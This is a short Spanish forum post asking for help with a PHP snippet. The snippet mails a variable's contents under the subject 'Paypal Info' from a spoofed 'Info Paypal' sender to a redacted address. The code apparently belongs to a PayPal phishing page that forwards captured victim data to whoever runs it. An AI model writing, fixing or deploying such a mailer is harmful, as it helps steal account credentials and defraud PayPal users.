Y el code es :
Código PHP:
$message = '
<html>
<head>
<title>pp</title>
</head>
<body>
<h3>'. $tslive .'</h3>
</body>
</html>';
$subj = "Paypal Info";
$from = "From: Info Paypal<[email protected]>";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
mail("[email protected]", $subj, $message, $from ,$headers);
?>
Espero su ayuda , un abrazo